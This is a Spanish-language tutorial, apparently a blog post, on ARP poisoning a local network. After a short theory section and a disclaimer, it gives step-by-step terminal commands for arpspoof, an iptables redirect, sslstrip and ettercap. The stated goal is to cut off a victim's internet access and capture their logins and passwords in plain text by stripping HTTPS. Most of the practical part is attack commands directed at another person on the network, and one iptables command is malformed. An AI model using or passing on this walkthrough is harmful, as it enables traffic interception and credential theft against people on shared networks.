Como realizar un envenenamiento por ARP.
Haga un uso responsable y legal de este post.
Primero un poco de teoría y luego como un ejemplo de como puedes ejecutarlo para comprobar la fortaleza de tus contraseñas.
El ARP Spoofing, también conocido como ARP Poisoning o ARP Poison Routing, es una técnica usada para infiltrarse en una red ethernet conmutada (basada en switches y no en hubs), que puede permitir al atacante leer paquetes de datos en la LAN (red de área local), modificar el tráfico, o incluso detenerlo.
Partimos de la premisa que es fundamental encontrarse dentro de la red por lo que donde es mas probable que esta técnica se realice en una red wireless.
Este esquema puede servirnos como ejemplo.
Pasos a seguir:
Para la ejecución utilizamos el sistema back|track 5 R3 es totalmente gratuito pudiendo descargarlo desde aquí.
*******************Nota importante no debemos de olvidarnos de que una vez instalado debemos saber que login es root y la contraseña es toor y seguidamente hemos de escribir startx para inciarlo*******************
1 escribimos en una terminal
echo 1 > /proc/sys/net/ipv4/ip_forward
2 luego en la misma terminal
iptables -t nat -A PREROUTING -p tcp –destination -pot 80 -j REDIRECT –to-port 1000
No cerramos esta teminal durante todo el proceso.
3 Si necesitamos saber nuestra dirección ip podemos hacerlo mediante mediante ifconfig (en otra terminal)
4 hacemos un escaner de la red mediante nmap
nmap -sP 192.168.1.0/24
Con ello vemos las direcciones de los objetivos que en nuestro caso son el router y ordenador que queramos, en este caso tiene la direccion 192.168.1.39
Esta terminal la podemos cerrar.
5 Abrimos otra terminal sin cerrar como he dicho la primera de todas y escribimos.
arpspoof -i eth0 -t direccion_ordenador_atacado direccion_rooter
p-e donde la primera es la dirección del ordenador a atacar y la segunda es la del router que hemos podido ver con el comando anterior de nmap
arpspoof -i eth0 -t 192.168.1.39 192.168.1.1
Pasados unos segundos comprobamos que el dispositivo atacado no tiene acceso a internet con lo que hemos conseguido un ataque tipo denegación de servicio (Deny Of Service).
Pero no nos conformamos con esto sino que podemos hacer que el usuario se crea que se encuentra en una conexión segura para lo que utilizamos la Herramienta SSL Strip Si la víctima no observar que HTTPS ha desaparecido de su navegador, si no se fija en ese pequeño detalle y se autentifique en algún sitio, sus credenciales irán en texto plano hacia el nosotros y, no solo vemos las contraseñas del protocolo https sino toda las contraseñas que introduce cuando navega mediante http tan bien las capturamos.
6 abrimos SSL-STRIP
7 Escribimos
python sslstrip.py -l 1000
No cerramos la terminal
8 Abrimos ettercap permite establecer ataque Man in the middle (hombre en medio). Para su apertura.
Applications-Backtrack-Privilege Escalation-Protocol Analysis-Network Sniffers-ettercap
9 escribimos
ettercap -Tq -i eth0
y solo nos basta observar para ver los datos que nos aparecen
En caso de que la victima escriba p-e algún loginy contraseña en alguna página, estos nos datos que que haya introducido el dispositivo atacado nos aparecerán a notros en texto plano.









